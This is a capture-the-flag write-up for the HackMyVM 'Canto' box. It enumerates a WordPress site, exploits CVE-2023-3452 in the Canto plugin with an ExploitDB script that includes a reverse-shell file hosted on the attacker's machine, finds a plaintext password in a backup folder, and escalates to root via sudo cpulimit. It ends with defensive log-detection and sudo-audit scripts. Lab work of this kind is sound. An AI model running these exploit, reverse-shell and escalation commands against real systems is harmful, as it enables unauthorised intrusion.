Canto Write-Up
Introduction
In this write-up, I will guide you through the steps I took to complete the HackMyVM - Canto CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Check out the video here (to be updated).
TL;DR
Reconnaissance
Network/Port Scanning (Nmap)
Command:
nmap -sV -sC -vv -oA canto 172.16.100.9
Explanation:
nmap: Tool used to scan network and ports to discover which services are running.
-sV: Perform version detection of services.
-sC: Scan using default scripts.
-vv: Very verbose output.
-oA: Output in all formats (normal, XML, grepable) with the base filename "canto".
172.16.100.9: IP address of the Canto VM on my network.
Output:

# Nmap 7.94SVN scan initiated Wed Aug 28 00:02:12 2024 as: nmap -sC -sV -vv -oA canto 172.16.100.9
Nmap scan report for 172.16.100.9
Host is up, received syn-ack (0.024s latency).
Scanned at 2024-08-28 00:02:21 PDT for 12s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKkMLZHCokv5rpKTUUfitgdTSiyieZXC1kqsQS8DEnLgk6x5fOmlzHim2qgiwoJhyEJa7Nj1k3K6pwm5RVxEjEU=
| 256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDR8+o8qabpIHzS2zgBZDxfX0Tm5eWBBstEt5QeYN04+
80/tcp open http syn-ack Apache httpd 2.4.57 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 6.6.1
|_http-title: Canto
|_http-server-header: Apache/2.4.57 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 28 00:02:33 2024 -- 1 IP address (1 host up) scanned in 20.37 seconds
Findings:
We see that there is a web server running on port 80.
Let's check out the web server and, in the background, run gobuster to brute force web directories.
Directory Brute-forcing (Gobuster)
Command:
gobuster dir -u http://172.16.100.9 -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
Note: I have setup an alias to run gobuster inside a docker container.
Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'
Explanation:
dir: Mode of operation indicating directory/file enumeration.
-u http://172.16.100.9: Base URL of the target web server to scan.
-w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt: Wordlist of directory and file names to try.
-x php,txt,html: Also search for the PHP, TXT and HTML file extensions.
Output:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.100.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/wp-content (Status: 301) [Size: 317] [--> http://172.16.100.9/wp-content/]
/index.php (Status: 301) [Size: 0] [--> http://172.16.100.9/]
/wp-login.php (Status: 200) [Size: 4735]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 318] [--> http://172.16.100.9/wp-includes/]
/readme.html (Status: 200) [Size: 7409]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 315] [--> http://172.16.100.9/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/wp-signup.php (Status: 302) [Size: 0] [--> http://172.16.100.9/wp-login.php?action=register]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1273832 / 1273833 (100.00%)
===============================================================
Finished
===============================================================
Findings:
The directories show that the web server is running WordPress.
Enumerating WordPress (wpscan)
Command:
wpscan --url http://172.16.100.9/ --detection-mode aggressive --enumerate u,vt,tt,vp --plugins-detection aggressive
Explanation:
--url http://172.16.100.9/: URL of the target WordPress site.
--detection-mode aggressive: Detect the WordPress version, themes and other findings by requesting known locations directly instead of relying on passive fingerprinting only.
--enumerate u,vt,tt,vp: Enumerate users (u), vulnerable themes (vt), timthumb files (tt) and vulnerable plugins (vp).
--plugins-detection aggressive: Detect plugins by requesting their known locations directly.
Output:


_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://172.16.100.9/ [172.16.100.9]
[+] Started: Wed Aug 28 07:14:02 2024
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://172.16.100.9/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.16.100.9/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.16.100.9/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.16.100.9/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:12 <==========================================================================> (702 / 702) 100.00% Time: 00:00:12
[i] The WordPress version could not be detected.
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:15 <=========================================================================> (7343 / 7343) 100.00% Time: 00:00:15
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] canto
| Location: http://172.16.100.9/wp-content/plugins/canto/
| Last Updated: 2024-07-17T04:18:00.000Z
| Readme: http://172.16.100.9/wp-content/plugins/canto/readme.txt
| [!] The version is out of date, the latest version is 3.0.9
|
| Found By: Known Locations (Aggressive Detection)
| - http://172.16.100.9/wp-content/plugins/canto/, status: 200
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF
| References:
| - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063
| - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0
|
| [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion
| Fixed in: 3.0.5
| References:
| - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452
|
| [!] Title: Canto < 3.0.7 - Unauthenticated RCE
| Fixed in: 3.0.7
| References:
| - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096
| - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability
|
| [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion
| Fixed in: 3.0.9
| References:
| - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338
|
| Version: 3.0.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.16.100.9/wp-content/plugins/canto/readme.txt
| Confirmed By: Composer File (Aggressive Detection)
| - http://172.16.100.9/wp-content/plugins/canto/package.json, Match: '3.0.4'
[+] Enumerating Vulnerable Themes (via Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <===========================================================================> (652 / 652) 100.00% Time: 00:00:02
[i] No themes Found.
[+] Enumerating Timthumbs (via Aggressive Methods)
Checking Known Locations - Time: 00:00:05 <=========================================================================> (2568 / 2568) 100.00% Time: 00:00:05
[i] No Timthumbs Found.
[+] Enumerating Users (via Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=============================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] erik
| Found By: Wp Json Api (Aggressive Detection)
| - http://172.16.100.9/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23
[+] Finished: Wed Aug 28 07:14:50 2024
[+] Requests Done: 11900
[+] Cached Requests: 10
[+] Data Sent: 3.196 MB
[+] Data Received: 43.609 MB
[+] Memory used: 396.051 MB
[+] Elapsed time: 00:00:47
Findings:
A user erik was found.
A vulnerable plugin canto (version 3.0.4) was found which allows Remote File Inclusion (RFI) and Remote Code Execution (RCE).
Visiting Web Page (Port 80)

This is a normal landing page with no special features. There is no extra information in the source code.
Exploiting The Vulnerability
Finding Exploit File
Let's search the ExploitDB to look for an exploit of the vulnerable plugin.
Command:
searchsploit canto
Output:

------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC) | windows/dos/45095.py
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) | multiple/webapps/49189.txt
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) | php/webapps/51826.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
We will use the third exploit as that is the one that is relevant in our case.
Get the path of the exploit and copy it to your current directory.
Command:
searchsploit -x php/webapps/51826.py
cp /usr/share/exploitdb/exploits/php/webapps/51826.py .
Output:

Exploit: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/51826
Path: /usr/share/exploitdb/exploits/php/webapps/51826.py
Codes: N/A
Verified: False
File Type: <missing file package>
Running The Exploit
Let's understand how the exploit works.
Command:
python3 51826.py
Output:

usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]
Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452
options:
-h, --help show this help message and exit
-u URL, --url URL Vulnerable URL
-s SHELL, --shell SHELL
Local file for web shell
-LHOST LOCAL_HOST, --local_host LOCAL_HOST
Local web server IP
-LPORT LOCAL_PORT, --local_port LOCAL_PORT
Local web server port
-c COMMAND, --command COMMAND
Command to execute on the target
-NC_PORT NC_PORT, --nc_port NC_PORT
Listener port for netcat
Examples:
- Check the vulnerability
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33
- Execute a command
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'
- Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php
I made a copy of the exploit file so that I can directly copy the commands given in the example.
cp 51826.py CVE-2023-3452.py
We can give a PHP Reverse Shell file as an argument to the exploit. So let's do that.
Download the reverse shell from https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Make the necessary changes in the code as shown.

Now, our exploit is ready with the reverse shell. We start our listener.
Command:
nc -lvnp 9000
Now we exploit.
Command:
python3 CVE-2023-3452.py -u http://172.16.100.9 -LHOST 172.16.5.10 -s php-reverse-shell.php
Output in listener:

First thing we do, is upgrade the shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
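The exploit above works by making the target include a PHP file hosted on the attacker's own web server (the -LHOST/-LPORT values). From the defender's side, that shows up in the Apache access log as a request to the Canto plugin path carrying a remote URL in a query parameter. The following is an added example, not code from the write-up or from the plugin: it scans constructed access-log lines for that pattern. The script file name and the parameter name in the sample lines are placeholders, not the plugin's real ones.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Requests under this path are the ones the vulnerable plugin serves.
PLUGIN_PREFIX = "/wp-content/plugins/canto/"

# Apache "combined" log format: client, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def remote_url_params(query):
    """Return (name, value) pairs whose decoded value is an absolute URL PHP could include."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(unquote(value))  # also catch double-encoded values
        if re.match(r'^(?:https?|ftp)://', decoded, re.I):
            hits.append((name, decoded))
    return hits

def analyse(lines):
    """Flag requests to the plugin path that pass a remote URL in the query string."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith(PLUGIN_PREFIX):
            continue
        hits = remote_url_params(parts.query)
        if hits:
            findings.append({"ip": m.group("ip"), "path": parts.path,
                             "status": int(m.group("status")), "params": hits})
    return findings

# Constructed sample log lines (placeholder script/parameter names, not the plugin's own).
SAMPLE_LOG = [
    '172.16.5.10 - - [28/Aug/2024:00:10:01 -0700] "GET /wp-content/plugins/canto/example.php?src=http://172.16.5.10:8000/shell.txt HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '172.16.5.10 - - [28/Aug/2024:00:10:03 -0700] "GET /wp-content/plugins/canto/example.php?src=http%3A%2F%2F172.16.5.10%3A8000%2Fshell.txt HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '10.0.0.7 - - [28/Aug/2024:00:11:15 -0700] "GET /wp-content/plugins/canto/assets/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [28/Aug/2024:00:11:16 -0700] "GET /index.php?p=http://example.org/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} status={f['status']} remote={f['params']}")
```

Only the two plugin requests carrying a remote URL are reported; the stylesheet request and the unrelated /index.php request are not.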

User (erik) Access
During our WordPress enumeration we had found a user erik. On checking out his /home/erik directory we find a notes directory that has some files in it:

This means we have to find that backups folder. So we search for a backups directory in the file system.
Command:
find / -name '*backups*' -type d 2>/dev/null
Explanation:
find /: The find command, used to search for files and directories. The / indicates that the search should start from the root directory and include all directories and subdirectories under it.
-name '*backups*': Match names containing "backups". The pattern is quoted so that the shell does not expand the glob before find sees it.
-type d: Restricts the search to directories only.
2>/dev/null: Redirects error messages (such as "Permission denied") to /dev/null.
Output:

find / -name *backups* -type d 2>/dev/null
/snap/core22/1439/var/backups
/snap/core22/1564/var/backups
/var/backups
/var/wordpress/backups
Findings:
The last directory, /var/wordpress/backups, is the one we will check out first because it seems the most relevant.
On checking out this directory we find a text file with the credentials of erik.
Command:
cd /var/wordpress/backups
ls -lash
cat 12052024.txt
Output:

cat 12052024.txt
------------------------------------
| Users | Password |
------------|----------------------|
| erik | th1sIsTheP3ssw0rd! |
------------------------------------
Now that we have the password for the erik user, we can try SSH.
Command:
ssh erik@172.16.100.9
Output:

Read the user.txt file to get the flag:
cat user.txt
Privilege Escalation
Let's check out the sudo permissions we have for erik.
Command:
sudo -l
Output:

Matching Defaults entries for erik on canto:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User erik may run the following commands on canto:
(ALL : ALL) NOPASSWD: /usr/bin/cpulimit
Findings:
We see that we can run the program /usr/bin/cpulimit with sudo permissions and without a password.
On checking GTFOBins we see that there is an entry for the cpulimit program: its -f option runs a given program, so we can use it to elevate privileges.
Command:
sudo cpulimit -l 100 -f /bin/sh
Output:

And thus we have root.
And finally, we can read the root flag:
cat /root/root.txt
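The root cause here is a NOPASSWD sudo rule on a program that can launch another program. As an added example (not from the write-up), the following parses the exact "sudo -l" output shown above and flags such rules; the list of shell-spawning binaries is an illustrative, incomplete GTFOBins-style list, not an authoritative one.

```python
import re

# Illustrative set of binaries that can execute an arbitrary program (GTFOBins-style);
# cpulimit is here because of its -f option. This list is an assumption, not complete.
SHELL_SPAWNERS = {"/usr/bin/cpulimit", "/usr/bin/find", "/usr/bin/vim",
                  "/usr/bin/env", "/bin/bash", "/bin/sh"}

# One sudoers rule line as printed by "sudo -l": (runas) TAG: cmd1, cmd2 ...
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$')

def parse_sudo_l(output):
    """Return the command rules listed after the 'User ... may run' line."""
    rules, in_cmds = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True  # defaults section is over; rules follow
            continue
        if not in_cmds:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "tags": tags, "command": cmd.strip()})
    return rules

def risky_rules(rules):
    """Rules granting ALL or a known shell-spawning binary; NOPASSWD makes them worse."""
    out = []
    for r in rules:
        binary = r["command"].split()[0]
        if binary == "ALL" or binary in SHELL_SPAWNERS:
            out.append(r)
    return out

# The "sudo -l" output from the box, copied verbatim from the write-up.
SUDO_L = """Matching Defaults entries for erik on canto:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit
"""

if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SUDO_L)):
        flag = "NOPASSWD, " if "NOPASSWD" in r["tags"] else ""
        print(f"RISK: {r['command']} as ({r['runas']}) {flag}can spawn a shell")
```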
Last updated